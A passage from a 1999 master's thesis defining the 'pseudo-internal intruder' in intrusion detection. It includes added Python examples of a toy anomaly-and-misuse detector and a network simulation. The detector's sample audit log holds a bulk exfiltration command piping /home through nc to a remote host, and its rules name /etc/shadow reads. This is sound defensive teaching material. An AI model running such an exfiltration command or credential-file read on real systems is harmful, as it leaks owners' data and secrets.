The Pseudo-Internal Intruder: A New
Access Oriented Intruder Category
A Thesis Presented to
The Faculty of the School of Engineering and Applied Science
University of Virginia
In Partial Fulfillment
of the Requirements for the Degree
Master of Science (Computer Science)
By
Brownell Kerr Combs
May 1999
The Pseudo-Internal Intruder
ii
Approval Sheet
This thesis is submitted in partial fulfillment of the
requirements for the degree of
Master of Science (Computer Science)
______________________________________________________
Author’s Name
This thesis has been read and approved by the Examining Committee:
______________________________________________________
Thesis Advisor
______________________________________________________
Committee Chairman
______________________________________________________
Accepted for the School of Engineering and Applied Science:
______________________________________________________
Dean, School of Engineering and Applied Science
May, 1999
Abstract
Intruders attack both commercial and federal distributed systems frequently, and
often successfully. The problem of intruders has become critical. The most effective
defense today is the use of intrusion detection systems, because it is widely considered to
be impossible to build complicated distributed systems that completely prevent
unauthorized intrusions. Since 1980 the intrusion detection community has divided
intruders into two categories based on the intruder’s access to a system. Internal
intruders have legitimate access through user accounts; external intruders break into a
system without benefit of a user account.
The proliferation of distributed systems with complex networks has necessitated a
reexamination of intruder definitions. When the notion of internal and external intruders
was defined, systems were largely stand-alone computers – typically contained in a single
area sometimes with remote peripherals. Today computers are part of networked,
distributed systems that may span multiple buildings sometimes located thousands of
miles apart. The network of such a system is a pathway for communication between the
computers in the distributed system. The network is also a pathway for intrusion.
We define a new category, the pseudo-internal intruder. This new category
encompasses intruders without user accounts who circumvent the perimeter defenses of a
modern distributed system and attack the system via its network. In contrast, external
intruders attack a system from the outside through a system’s perimeter defenses. Having
a pseudo-internal category is useful because it gives the intrusion detection community a
framework in which to clearly describe the capabilities of the pseudo-internal intruder,
defend against the pseudo-internal intruder, and develop techniques for detecting the
pseudo-internal intruder.
Acknowledgments
I would like to thank my advisor, Dr. Anita Jones, not only for her guidance and
support during the thesis process, but her help and advice with my career.
I would also like to thank Bob Sielken for thought provoking discussions on the
topic of intruders, Andy Lowe for help with the case study network and technical
proofreading, Chris Milner for advice on numerous tasks around the department, and
Peggy Reed for always being willing to lend a hand. I also appreciate the flexibility of
my employers at SAIC, Robert Schlansker, Dave Carothers, and William Baugh, in
allowing me to split time between work and school.
Thanks and love to Melissa Meehan and Craig Hille for their support and making
my time in Charlottesville much more enjoyable.
Lastly, I send my love and appreciation to my mother, father, and stepfather for
all of their support and unconditional love since I departed for boarding school some 9
years ago. I could never have achieved this without you.
Table of Contents
Approval Sheet ..... ii
Abstract ..... iii
Acknowledgments ..... iv
Table of Contents ..... v
Figures ..... vi
Tables ..... vii
Chapter 1: The Pseudo-Internal Intruder ..... 1
  1.1 Introduction ..... 1
  1.2 Literature Survey ..... 2
  1.3 Approaches to Categorizing Intruders ..... 6
  1.4 Definitions ..... 10
  1.5 A New Access Oriented Intruder Category ..... 18
  1.6 The Pseudo-Internal Intruder: A Distinct Category? ..... 21
Chapter 2: Capabilities of the Pseudo-Internal Intruder ..... 24
  2.1 Tools and Techniques Used by the Pseudo-Internal Intruder ..... 24
  2.2 Dangers of the Pseudo-Internal Intruder ..... 31
Chapter 3: Security Recommendations ..... 39
  3.1 Defending Systems Against the Pseudo-Internal Intruder ..... 39
  3.2 Defending the Distributed System: Preventing Intruder Access ..... 43
  3.3 Defending the Distributed System: Mitigating Intruder Access ..... 46
  3.4 Defending the Distributed System: Detecting Intruder Access ..... 49
Chapter 4: Case Study ..... 52
  4.1 Introduction ..... 52
  4.2 The Target System ..... 53
  4.3 The Pseudo-Internal Intruder Attacks ..... 57
  4.4 Expected Results ..... 59
  4.5 Results of Attacks on Target System – Phase 1 ..... 60
  4.6 Security Changes Made to Testbed System for Phase 2 ..... 65
  4.7 Results of Attacks on Target System – Phase 2 ..... 68
  4.8 Summary ..... 72
Chapter 5: Conclusions and Future Work ..... 75
  5.1 Conclusions ..... 75
  5.3 Future Work ..... 76
References ..... 77
Figures
FIGURE 1-1: PHYSICAL CONFIGURATION OF EXAMPLE NETWORK ..................................... 12
FIGURE 1-2: NETWORK CONFIGURATION OF SAME NETWORK FROM FIGURE 1-1 ......... 17
FIGURE 1-3: BOX DIAGRAM OF INTRUDER CATEGORIES ......................................................... 19
FIGURE 2-1: IPV4 PACKET HEADER .................................................................................................. 25
FIGURE 4-1: NETWORK CONFIGURATION OF PHASE 1 TESTBED SYSTEM.......................... 55
FIGURE 4-2: NETWORK CONFIGURATION OF PHASE 2 TESTBED SYSTEM.......................... 67
Tables
TABLE 4-1: NODES IN TESTBED DISTRIBUTED SYSTEM............................................................. 53
Chapter 1: The Pseudo-Internal Intruder
1.1 Introduction
Each day intruders attack numerous distributed systems. A 1996 report estimated
that Department of Defense systems alone are attacked on average over 680 times per day
[GAO96]. The report further estimated that as many as 65 percent of those attacks were
successful in gaining access to sensitive information. More than 99 percent of all
respondents reported at least one security incident in one recent survey [Pow99], while 78
percent of organizations responding to a 1996 survey reported financial loss from security
breaches [DV97]. The Computer Emergency Response Team (CERT) annual reports
show a 67 percent increase in security incidents handled annually by CERT from 1994 to
1998 [CER94, CER98].
The problem of successful intrusions is not expected to end any time soon. Most
experts believe that it is not practically possible to build a complex distributed system
that is completely secure. Even if some new development allowed such a system to be
created, the vast installed base of vulnerable systems would guarantee a lengthy transition
period during which intrusions would still occur [Sun96]. For these reasons security
experts advocate the use of intrusion detection systems.
Developers of intrusion detection systems, and those responsible for network
security of distributed systems, face the difficult task of defending against an ever
changing set of potential intrusions. Each day new attack tools and techniques are
developed and it is increasingly difficult for system administrators and intrusion detection
system developers to stay ahead of malicious computer users (witness the recent success
of the Melissa e-mail virus [CNN99]). Any framework that helps such administrators
and developers to understand and classify potential intruders is useful in the struggle to
protect distributed systems.
Chapter 1 of the thesis introduces the topic of intruder categories, describes the
evolution of intruder categories, and defines important terms and explains aspects of
network security that are required to discuss the pseudo-internal intruder. Chapter 1
concludes with a definition and explanation of the pseudo-internal intruder as a new and
distinct access oriented intruder category. Chapter 2 lists the tools and techniques
available to pseudo-internal intruders and the threat represented by such intruders. Two
example intrusion scenarios illustrate the threat of the pseudo-internal intruder. Chapter
3 describes an overall strategy that can be used to defend distributed systems against
pseudo-internal intruders. Chapter 4 contains the results of a case study illustrating the
effectiveness of the defensive strategy outlined in chapter 3. Chapter 5 contains the
conclusions of the thesis and speculates on interesting future work.
1.2 Literature Survey
In 1980 J.P. Anderson introduced the concept of intrusion detection [And80].
Anderson proposed a “security surveillance system” involving formal examination of a
system’s audit logs. In examining the system threats, Anderson also introduced the
notion of categorizing intruders based upon their access to a system. He noted that in
“considering the threat problem, the principle breakdown of threats is on the basis of
whether or not an attacker is normally authorized to use the computer system.” Internal
intruders were defined as those with permissions to access the system and external
intruders were those without any permissions. Therefore the external intruder category
included not only outsiders from other organizations, but also anyone in physical
proximity to the computer system who had no user access to it.
It is important to note that when Anderson wrote his report there were very few
distributed systems. In fact, the report that introduced the concepts of intrusion detection
and access oriented intruder categories was an actual study of a customer’s single
computer system, “the purpose of which was to improve… computer security…”
Therefore, it is easy to see why Anderson chose not to differentiate between outsiders and
those with physical access, but without authorized user access to the computer system.
Whether through tapping wire communication (outsider) or physical access to a terminal
(employee without permissions) the best that either could achieve was a login prompt.
Both groups of intruders had to deal with the same technical barrier: the system’s access
control security measures.
By the mid 1980s the landscape was, however, changing. Distributed systems
were becoming predominant over single computer systems. That change started a debate
in the network security field as to what changes should be made to existing security
principles to adapt them to distributed systems. In 1985 Anderson claimed that “network
security issues can be handled with the same concepts that apply to single computer
systems” [And85].
Anderson’s opinion appeared to be in the minority. Nessett argued that “a strong
case [could] be made that distributed systems admit important security issues that either
are not applicable to stand-alone systems or are assumed to be rarely relevant… [Such]
issues add extra dimensions to the distributed system security problem and invalidate
attempts to simply extend existing concepts into the area of distributed system security”
[Nes87]. Others pointed out that any protection mechanism residing in a single computer
becomes insufficient when a computer is connected to a network because those
mechanisms cannot protect the security of communication across the network [LS90].
Such distributed systems require a security enforcement mechanism for the network in
addition to any mechanisms residing on single machines [LS90].
There was, however, no dispute that both stand alone and distributed systems
needed real time intrusion detection. In her paper introducing a new intrusion detection
model, Denning argued that “developing systems that are absolutely secure is extremely
difficult, if not generally impossible. [Additionally], even the most secure systems are
vulnerable to abuse by insiders who misuse their privileges” [Den87]. Denning’s model
of intrusion detection was an adaptation of Anderson’s original idea of utilizing audit
logs for intrusion detection. Since “exploitation of a system’s vulnerabilities involves
abnormal use of the system,” intrusions can be detected by monitoring audit logs and
other indicators for abnormal patterns of system usage [Den87].
Denning’s model of intrusion detection is considered to be the beginning of the
second generation of intrusion detection which was more statistically sophisticated,
addressed distributed systems, and provided some real time alerts [JS99]. This second
generation of intrusion detection systems is divided into two approaches: anomaly
detection and misuse detection. Intrusion detection systems based on anomaly detection
characterize the correct behavior of a system and then detect wrongful changes to that
correct behavior. Misuse detection systems characterize known ways to penetrate a
system and then monitor for those misuse characterizations to appear. This progression
of intrusion detection can be more closely followed in a number of recent surveys of
intrusion detection techniques and products [CH96, Lun93, Sun96, JS99].
A majority of intrusion detection experts currently believe that the best intrusion
detection system will contain both anomaly detection and misuse detection mechanisms.
One such intrusion detection system that includes both anomaly detection and misuse
detection mechanisms is the Next-generation Intrusion Detection Expert System (NIDES)
[AFV95]. NIDES contains a statistically dynamic anomaly detector to catch internal
intruders masquerading as legitimate users. A profile consisting of more than 30
different criteria (such as CPU usage and typical amounts of input and output) is
maintained for each user. User actions are matched against that individual’s profile and
“when the observed activity departs from established patterns of use for an individual”
alarms are raised by the intrusion detection system [SRI97]. The mechanism is
statistically dynamic (as opposed to static) since NIDES adapts each user’s profile over
time. If a user’s habits change slowly over time, the profile will be adapted to the new
behavior without raising alarms. Profiles can also be created for workstations, remote
hosts, groups of users, or particular application programs [JS99].
NIDES also contains an expert-system misuse detector to “detect attempts to
exploit known security vulnerabilities of the monitored systems and intruders who exhibit
specific patterns of behavior that are known to be suspicious or in violation of site
security policy” [SRI97]. NIDES observes the system and compares its observations to a
rule database of known intrusion scenarios and attack patterns. The security experts that
created NIDES initially constructed the rule database, but the system administrator of the
system NIDES is protecting can customize the database.
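To make the two mechanisms concrete, the following added example (written for this edition, not code from NIDES or from the thesis) runs both over a constructed audit log. The anomaly side keeps a per-user profile in the spirit described above: an exponentially weighted mean and variance of CPU time and I/O volume, so a user whose habits drift slowly is absorbed without alarms while a sudden departure raises one. The misuse side matches each command against a small rule database. The user names, metric choices, alpha, threshold, warm-up count and rules are all assumptions chosen for illustration.

```python
"""Added example: a toy second-generation intrusion detector combining an
adaptive statistical anomaly detector (in the spirit of the NIDES profile
described above, not NIDES code) with a rule-based misuse detector.
The audit records, metric names, thresholds and rules are constructed."""
import math
import re
from collections import defaultdict

# Constructed audit records: (user, cpu_seconds, bytes_io, command).
AUDIT_LOG = [
    ("alice", 2.1, 12_000, "ls"),
    ("alice", 1.8, 9_500, "vi"),
    ("alice", 2.4, 11_000, "make"),
    ("alice", 2.0, 10_200, "gcc"),
    ("alice", 2.2, 10_800, "ls"),
    ("alice", 1.9, 9_900, "vi"),
    ("alice", 2.3, 11_300, "make"),
    ("alice", 2.1, 10_500, "gcc"),
    ("alice", 48.0, 900_000, "tar cf - /home | nc 10.0.0.9 4444"),  # masquerader bulk export
    ("bob", 3.0, 20_000, "cat /etc/shadow"),                          # hits a misuse rule
]

# Constructed: a user whose habits drift slowly; the profile should follow.
SLOW_DRIFT = [("carol", 2.0 + 0.1 * k, 10_000, "ls") for k in range(12)]

# Misuse rule database: (rule name, pattern over the command line). Assumed rules.
MISUSE_RULES = [
    ("read shadow password file", re.compile(r"/etc/shadow")),
    ("interactive root escalation", re.compile(r"\b(su|sudo)\b")),
]


class Profile:
    """Per-user statistics, adapted with an exponentially weighted update so
    gradual changes in habit are absorbed while sudden departures stand out."""

    def __init__(self, alpha=0.2):
        self.alpha = alpha          # weight given to the newest observation
        self.n = 0                  # records seen for this user
        self.mean = defaultdict(float)
        self.var = defaultdict(float)

    def zscore(self, metric, value):
        sd = math.sqrt(self.var[metric])
        return abs(value - self.mean[metric]) / sd if sd > 0 else 0.0

    def update(self, observation):
        for metric, value in observation.items():
            if self.n == 0:
                self.mean[metric] = value
                self.var[metric] = 0.0
            else:
                delta = value - self.mean[metric]
                self.mean[metric] += self.alpha * delta
                self.var[metric] = (1 - self.alpha) * (self.var[metric] + self.alpha * delta * delta)
        self.n += 1


def detect(records, threshold=3.0, min_samples=5):
    """Return alerts as (record index, user, kind, detail) tuples."""
    profiles = defaultdict(Profile)
    alerts = []
    for i, (user, cpu, bytes_io, command) in enumerate(records):
        # Misuse detection: match the command against known bad patterns.
        for name, pattern in MISUSE_RULES:
            if pattern.search(command):
                alerts.append((i, user, "misuse", name))
        # Anomaly detection: compare against the user's adapted profile,
        # once enough history exists to make the comparison meaningful.
        profile = profiles[user]
        observation = {"cpu": cpu, "bytes_io": bytes_io}
        if profile.n >= min_samples:
            deviant = sorted(m for m, v in observation.items()
                             if profile.zscore(m, v) > threshold)
            if deviant:
                alerts.append((i, user, "anomaly", ",".join(deviant)))
        profile.update(observation)
    return alerts


if __name__ == "__main__":
    for alert in detect(AUDIT_LOG):
        print(alert)
    print("slow drift alerts:", detect(SLOW_DRIFT))
```

Running it flags alice's ninth record on both metrics (a profile built from her first eight) and bob's command by rule, while carol's steadily rising CPU use never trips the threshold because the profile moves with her. Note the warm-up: bob has no history, so only the misuse detector can see his first action, which is exactly the gap the rule database exists to cover.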
Even though it is accepted that distributed systems require different security
mechanisms than stand-alone systems, the intruder categories defined for stand-alone
systems are still in use. Many modern intrusion detection system research papers still
describe the threat of intruders as non-authorized (external) and authorized (internal)
users [IKP95]. Recall that in Anderson’s seminal paper he only evaluated the threat of an
intruder with respect to whether the intruder had authorized user access to the computer.
As discussed, this made perfect sense when considering a stand alone computer. But
with the proliferation of the distributed system, this way of categorizing intruders should
be reexamined for distributed systems in a manner similar to the reexamination of
security concepts.
1.3 Approaches to Categorizing Intruders
There are two main approaches to classifying intruders. The first is to simply
separate intruders into categories based on their access to a system. An example of this
approach is the previously discussed traditional pair of categories: external and internal
intruders [And80]. The external intruder is an outsider who has no authorized access to
the system and must gain access by compromising the system’s security. The internal
intruder is one who already has limited access to the system through an authorized user
account. An internal intruder can either be a legitimate user or an outsider who is
successfully masquerading as a legitimate user.
The second approach categorizes intruders not by access to a system, but by the
method of attack used by the intruder. One example of such an approach divides all
attacks into three modes: outside, within, and below [Neu98]. Attacks from the outside
come from above or laterally at the same abstraction level. These types of attacks can be
unprivileged intrusions where a security flaw was exploited to allow access with no
authorization required. Attacks from within are obtained with the privileges of the given
level. That is, the attack originates from a privileged user or an outsider successfully
masquerading as a privileged user (through password cracking, etc). Attacks from below
are at a lower layer of abstraction. These attacks are either hardware or operating system
based and can require some unusual physical access to the system. One example of this
type of attack would be connecting a hardware sniffer to the network to gather
information.
Both approaches have their disadvantages with respect to their use in describing
intruders. The traditional access oriented approach of splitting all intruders into external
and internal categories is too simplistic since it was originally designed for solitary
machines where everyone either did (internal) or did not (external) have a user account
on that machine. When one replaces the solitary machine with a distributed system, the
issue of defining an intruder’s access becomes much more complicated. Distributed
systems can have multiple levels of users on multiple machines, complex trust
relationships between machines, the network infrastructure connecting the machines, and
quite often connections to other uncontrolled networks (even including the Internet).
Compare the complexity illustrated above to a solitary machine with a single operating
system where each individual is either a user or a non-user without an account, and the
increased vulnerabilities become obvious.
The nature of the more complicated distributed system introduces many new
vulnerabilities and ways in which an intruder might access the system. It is often stated
by experts that system security for distributed systems is fundamentally more complex
than it is for stand-alone systems [Nes87]. Therefore extending security concepts
developed for stand-alone systems to distributed systems is often not practical [Nes87].
Yet many continue to use only the traditional internal and external access oriented
categories, even though it is clear that the transition to networked systems has increased
the kinds of access to a distributed system as well as the possible range and complexity of
attacks that intruders might attempt. When considering access to a distributed system,
defining an intruder as either external or internal has become an ambiguous definition.
Since neither has a user account, a janitor damaging network equipment and an Internet
hacker attempting to break through a firewall are both considered external intruders. The
problem is that in a distributed system the external and internal categories include so
many kinds of access to the system that referring to an intruder as either of the categories
is no longer distinctive enough.
Attack oriented categorization can also present an ambiguity problem, but one of
a different type. The problem is that a single intruder can often attempt attacks from
more than one category (outside, within, and below). An example of such ambiguity
would be an authorized user on a UNIX machine (internal intruder) running a software
sniffer (attack from below), exploiting a FTP bug (attack from within), or using that
machine’s privileges to gain access to other machines (security/logic flaw, attack from
outside). If the system administrator only knows that just one of these attacks occurred it
may be difficult to determine the source of the attack. Depending on a machine’s
configuration, it is sometimes possible that both authorized users of the machine and
non-users connected to the machine can exploit certain FTP bugs to gain root access. If no
effort is made to identify the type of access, but only the type of attack, the system
administrator of the above machine will not know whether the machine was hacked from
the outside or whether the intruder is internal, i.e. an authorized user. So while the attack
oriented approach may be useful for some purposes, it is not the best choice to
unambiguously define intruders.
The most effective approach to categorizing intruders is to modify the existing
access oriented approach to account for the complications of distributed systems and all
that has been learned through examinations of attack methods such as the attack oriented
categorization approach. In order to discuss intruders in unambiguous terms this
modification of the traditional access oriented categorization must seek to create more
numerous, but distinct, access oriented categories. The access oriented approach will
become less ambiguous as categories are added, while the addition of categories to the
attack oriented approach will not change the fact that a given intruder can launch attacks
from more than one category. To this end we define and analyze a new distinct category
of intruder. The pseudo-internal intruder is the intruder who has the system access to
launch many of the attacks that did not exist prior to distributed systems and which are
difficult for external or internal intruders to utilize. The end result of defining the
pseudo-internal intruder will be a framework in which the scientific intrusion detection
community can clearly describe the capabilities of the pseudo-internal intruder, develop
techniques for detecting the pseudo-internal intruder, and consider defenses against the
pseudo-internal intruder.
1.4 Definitions
Without clear definitions it would be impossible to adequately convey the
different types of access to and within a system. Since this thesis defines intruders based
on their access, it is important to have these precise definitions for most aspects of a
typical distributed system environment.
A distributed system is an interconnection of two or more computers over a
network. Modern distributed systems often contain many more than two computers as
well as other hardware devices that facilitate digital communication, network
maintenance, and security. The network is the backbone used by elements of a
distributed system to communicate. Since most distributed systems interface with other
distributed systems or the Internet, a particular distributed system’s network will
sometimes be referred to as an internal network to distinguish it from other networks.
It is important to note that our definition of a distributed system is different from
the classic definition. For the purpose of this thesis, we include systems that some
would consider merely networked systems in our definition of a distributed system. We
also assume that any distributed system is reasonably set up with respect to
functionality and security. There is little point in discussing distributed systems with no
network traffic at all (no functionality) or with no defenses to protect them from
intruders (no security measures).
Each distributed system has an owner that is the single administrative and
operational authority. The owner has the ultimate responsibility for maintaining the
distributed system. Owners of large distributed systems often delegate operational
authority over all or parts of the system to system administrators, who adhere to both a
functionality policy and a security policy. The owner of the system creates both policies.
A functionality policy dictates what purpose a distributed system is supposed to serve. A
security policy states what security measures are to be used in a distributed system.
When combined, these two policies control the balance between functionality and
security (i.e. additional security usually comes at the cost of functionality).
Each network contains network devices that facilitate communication between
machines by managing and directing the flow of packets of information bound from one
machine to another. For our purposes we will divide network devices into two types:
routers and hubs. Routers are network devices that selectively forward packets based
upon the intended destination of the packet. For example, if a router has three choices of
directions to forward a packet, it will only forward the packet in directions of intended
recipients (instead of all three directions). Hubs are network devices that forward packets
without selectivity. A hub forwards each packet to every device connected to the hub.
Every distributed system has a physical configuration that includes all of the
hardware used in the distributed system as well as the location of each hardware item.
This not only includes computers, but peripherals like printers and scanners, network
devices such as routers and hubs, as well as all networking cable. In short, anything that
is connected to the internal network of a distributed system, including the hardware that
constitutes the interconnections, is part of its physical configuration. The physical
configuration can be geographically represented on a three dimensional map based upon
the physical location of all the hardware.
The physical perimeter of a distributed system is a three dimensional geographic
boundary such that no hardware item of the physical configuration is outside the
boundary. With the exception of hardware items used to create a connection with a
system outside the physical perimeter, all of the physical elements of the entire
distributed system are inside the physical perimeter. Such hardware items used to make
connections with other systems can reside on the physical perimeter, but never outside it.
Physical perimeter defenses protect the hardware items of the physical configuration
from unauthorized access. These defenses are designed to prevent unauthorized persons
from ever crossing the physical perimeter. Examples of physical perimeter defenses
include guards, fences, locked doors, and even lead shielding around cables.
Figure 1-1: Physical Configuration of Example Network
Figure 1-1 shows the physical configuration of an example distributed system that
is connected to the Internet and one other external distributed system. All of this
distributed system’s hardware is surrounded by the physical perimeter. The internal
network consists of several network devices (a router and two hubs), four machines, and
a printer. One of the machines is connected to a modem, but the modem is not yet
connected to a phone line.
Each distributed system also has a network configuration: a representation of how
all elements of the physical configuration are connected and interact with each other.
When drawn graphically, it shows the digital pathways connecting each piece of hardware
(a node) in the physical configuration, but does not show physical size, distance, or
geographic location. Since the network configuration
also specifies the ways in which the elements of the configuration use the pathways to
communicate with each other, network protocol stacks and segmentations of a network
are aspects of the network configuration. A network protocol is a definition of how two
or more nodes on the network will communicate [Tan96]. A network protocol stack is a
collection of network protocols chosen by the system administrator to be used in a
particular distributed system [Tan96]. A segment of a network is a collection of elements
that only receive network traffic intended for one of the nodes in the segment.
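The following added example (written for this edition, not code from the thesis or its testbed) turns the definitions above into a small simulation: hubs repeat every packet without selectivity, routers forward only toward the destination, and a segment is computed as the set of hosts that share a hub with no router between them. It also places a firewall and an audit tool at the outside connect, as the perimeter defenses described later in this section do, so that outside-originated packets are filtered by an allow list and recorded. The topology (loosely modelled on Figure 1-1), the node names, the ports and the policy are all constructed assumptions. Delivering a few packets shows which hosts' wires carry each one, which is precisely what a sniffer on a hub segment can observe.

```python
"""Added example: a toy model of the network configuration, segments and
perimeter defenses defined in this section.  Hubs flood, routers forward
only toward the destination, a firewall at the outside connect applies an
allow list to outside-originated packets, and an audit tool records
outside-originated traffic.  The topology, node names and policy are
constructed; nothing here is taken from the thesis's testbed."""
from collections import defaultdict, deque


class Network:
    """Nodes are hosts, hubs, routers or firewalls joined by two-way links."""

    def __init__(self):
        self.kind = {}                 # node name -> "host" | "hub" | "router" | "firewall"
        self.outside = set()           # nodes in the outside world
        self.links = defaultdict(set)  # adjacency
        self.allow_inbound = {}        # firewall -> {(dst, dport)} let in from outside
        self.audit = []                # audit tool records: (src, dst, dport, verdict)

    def add(self, name, kind, outside=False, allow_inbound=()):
        self.kind[name] = kind
        if outside:
            self.outside.add(name)
        if kind == "firewall":
            self.allow_inbound[name] = set(allow_inbound)

    def link(self, a, b):
        self.links[a].add(b)
        self.links[b].add(a)

    def reaches(self, start, target, blocked):
        """True if `target` is reachable from `start` without entering `blocked`."""
        seen, queue = {blocked, start}, deque([start])
        while queue:
            node = queue.popleft()
            if node == target:
                return True
            for nxt in self.links[node]:
                if nxt not in seen:
                    seen.add(nxt)
                    queue.append(nxt)
        return False

    def segment(self, host):
        """Hosts that receive every frame `host` sends (hub-connected, no router between)."""
        seen, queue, hosts = {host}, deque([host]), set()
        while queue:
            node = queue.popleft()
            if self.kind[node] == "host":
                hosts.add(node)
            if node == host or self.kind[node] == "hub":   # stop at routers/firewalls
                for nxt in self.links[node]:
                    if nxt not in seen:
                        seen.add(nxt)
                        queue.append(nxt)
        return hosts

    def deliver(self, src, dst, dport):
        """Send one packet; return the set of hosts whose wire carries it."""
        observers = set()
        stack = [(src, None)]
        while stack:
            node, prev = stack.pop()
            kind = self.kind[node]
            if kind == "host" and node != src:
                observers.add(node)          # a sniffer here would see the packet
                continue
            if kind == "firewall" and src in self.outside:
                allowed = (dst, dport) in self.allow_inbound[node]
                self.audit.append((src, dst, dport, "allowed" if allowed else "denied"))
                if not allowed:
                    continue                 # dropped at the network perimeter
            for nxt in self.links[node] - {prev}:
                # Hubs (and the sending host) repeat without selectivity;
                # routers and firewalls forward only toward the destination.
                if kind in ("host", "hub") or self.reaches(nxt, dst, blocked=node):
                    stack.append((nxt, node))
        return observers


def build_example():
    """Constructed topology loosely modelled on Figure 1-1: one router, two hubs,
    an outside connect guarded by a firewall that only admits web traffic."""
    net = Network()
    net.add("internet", "host", outside=True)
    net.add("fw", "firewall", allow_inbound=[("www", 80)])
    net.add("router", "router")
    for hub in ("hubA", "hubB"):
        net.add(hub, "hub")
    for host in ("alice", "bob", "carol", "www", "printer"):
        net.add(host, "host")
    net.link("internet", "fw")
    net.link("fw", "router")
    net.link("router", "hubA")
    net.link("router", "hubB")
    for host in ("alice", "bob", "carol"):
        net.link("hubA", host)
    for host in ("www", "printer"):
        net.link("hubB", host)
    return net


if __name__ == "__main__":
    net = build_example()
    print("segment of alice:", sorted(net.segment("alice")))
    for pkt in [("alice", "bob", 22), ("alice", "www", 80),
                ("internet", "www", 80), ("internet", "alice", 23)]:
        print(pkt, "seen by", sorted(net.deliver(*pkt)))
    print("audit:", net.audit)
```

Two things stand out when it runs. A packet from alice to bob is also carried to carol's wire, because all three share a hub; a packet from the Internet to www reaches only the hosts on www's hub, because the router forwards selectively. And the audit tool records only the two outside-originated packets, one admitted and one denied, while alice's own outbound traffic passes the firewall unrecorded, matching the recording policy described for audit tools in this section.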
The network perimeter is the separation between a distributed system’s internal
network and the outside world. The outside world to any given distributed system is
anything outside either its physical or network perimeter. Similar to the physical
perimeter, the network perimeter encompasses all nodes and digital pathways of the
internal network. The network perimeter does not, however, exist in physical space like
the physical perimeter. The network perimeter is merely a conceptual boundary
separating the internal network from all other networks (anything in the outside world).
The physical perimeter encompasses the actual physical location of each hardware
component in the physical configuration.
A network perimeter defense is anything at an outside connect that serves to
detect and prevent unauthorized access to the distributed system. An outside connect is a
point on the network perimeter that allows two-way communication between the
distributed system and the outside world. There are three different types of network
perimeter defenses: firewalls, audit tools, and authentication packages. Firewalls are
software packages or pieces of hardware that limit the network traffic passing through the
network perimeter into the internal network of a distributed system. The restrictions on
network traffic can range from letting nothing at all through to letting virtually all traffic
into the internal network. The restrictions are set based upon the requirements of a
distributed system’s functionality and security policies. For example, if the owner of a
distributed system decides to host web pages that can be seen by users of the Internet
then at least certain traffic related to that web service must be let through the firewall.
Audit tools record all or part of the network traffic activity observed by the tool. The
amount and kinds of traffic recorded are dictated by the functionality and security
policies of the distributed system in question. An audit tool might be programmed to
record all communication originating from outside the network perimeter, but not
communications originating from inside the network perimeter. System administrators of
large distributed systems must often limit the information recorded by audit tools because
the sheer volume of all traffic would require large amounts of disk storage that are not
practical.
Authentication packages control access to a distributed system’s internal network
from outside the network perimeter through user accounts and passwords. Owners of a
distributed system can allow authorized users that are located outside of the network
perimeter a higher level of access. Authenticating the identity of the person attempting to
connect to the internal network securely allows this higher level of access for particular
users. The process is very similar to logging into a network from inside the network
perimeter.
There is also a unique case of an outside connect that needs to be defined. The
rogue outside connect is an outside connect whose existence is unknown to the owner of
the distributed system that it connects to the outside world. Rogue outside connects are
elements of the network configuration, but are not in the owner’s perception of the
current network configuration of a distributed system. This means that they cannot be
assumed to have any of the network perimeter defense mechanisms usually associated
with outside connects.
The most likely way for a rogue outside connect to occur is when unauthorized
hardware becomes part of the physical configuration without the knowledge or
permission of the system administrators. One example would be if an employee brought
a modem to work and connected it to their desktop computer. If that desktop computer is
connected to the network then it is a part of the system’s physical configuration and a
node of the network configuration. Attaching a new piece of hardware to the computer,
like the modem, is adding a new piece of hardware to the physical configuration.
Connecting a phone line to that hardware item (the modem) already connected to the
network creates an outside connect. The modem would allow someone from outside the
network perimeter of the system to dial into the modem and gain access to the network
through the computer the modem is attached to. Since system administrators are unaware
of this outside connect, the desktop computer does not have the appropriate network
perimeter defenses.
Another example of a potential rogue outside connect can be created by an
unauthorized or misconfigured remote network management device. An administrator
must manage network devices like hubs and routers by reconfiguring them as changes are
made to a system’s network configuration. This management of network devices is
normally done from a remote location like a central network operations center. Remote
network management devices allow communication between a network device and a
remote system administrator. The most common example of a remote network
management device is a modem connected to a particular network device like a router.
Since communication between the management device and the remote manager is not
done through the normal pathways of digital communication in the distributed system,
remote network management devices require an entirely different set of security features
as opposed to normal network perimeter defenses. If a remote network management
device has been installed without the knowledge of the system administrators, then these
special network perimeter defenses have not been set up. Therefore, the remote network
management device would be a rogue outside connect.
Figure 1-2: Network Configuration of Same Network from Figure 1-1
Figure 1-2 shows a network configuration of the same sample distributed system
from figure 1-1. Notice how different the physical and network configurations can
appear since one is based on the physical location of hardware and the other is not. The
internal network is surrounded by a network perimeter separating the internal network
from the outside world. The Internet and the other distributed system are connected to
the internal network by an outside connect that is guarded by a firewall. Also notice that
the modem has now been connected to an outside telephone line. Assuming that the
system administrators do not know about the modem, that connection forms a rogue
outside connect.
1.5 A New Access Oriented Intruder Category
As has been discussed, the problem with having only two categories is that
intruders with varying degrees of access to a system are combined into the same
category. When the concept of internal and external intruders was defined in 1980
systems were largely stand-alone computers. Therefore, those concerned with intrusions
were mainly focused on the damage rogue users could do (internal intruders). Not only
was it difficult for an external intruder to gain access to a single guarded room, but there
was little such an intruder could do without a user account. In fact, there was such focus
over internal intruders that the internal intruder category was further broken up into three
subcategories (masquerading, clandestine, and legitimate) while the external category
was basically defined as ‘anything not internal’ [And80].
Today most systems are large distributed systems running over complex
networks. Such a change from stand-alone systems to networked, distributed systems
necessitates a reexamination of categorizing intruders. The scientific intrusion detection
community must consider the differences between a traditional external intruder attacking
a system from outside the network perimeter and one attacking the system from inside the
network perimeter. This thesis will examine these traditionally external intruders who
have access inside the network perimeter of a distributed system, but do not have any of
the privileges granted to authorized users. These intruders are called pseudo-internal
intruders.
Figure 1-3: Box Diagram of Intruder Categories
The pseudo-internal intruder is an intruder who has circumvented network
perimeter defenses and gained access to the network of a distributed system without
utilizing any user accounts. The primary difference between the pseudo-internal intruder
and the external intruder is that the pseudo-internal intruder has completely bypassed, not
broken through, any network perimeter defenses. Therefore system administrators
relying solely upon network perimeter defenses to notify them of intrusions will have no
knowledge of the existence of a pseudo-internal intruder.
A pseudo-internal intruder must gain access to a distributed system’s network
without using an outside connect since all outside connects are monitored by network
perimeter defenses (i.e. the intruder must get inside the network perimeter without
encountering network perimeter defenses). There are two ways to gain this unique type
of access: either by violating the physical perimeter to get physical access to the hardware
of the distributed system or by accessing the network configuration through a rogue
outside connect. Recall that because the existence of a rogue outside connect is not
known by a system’s owners, it is not monitored by any of the network perimeter
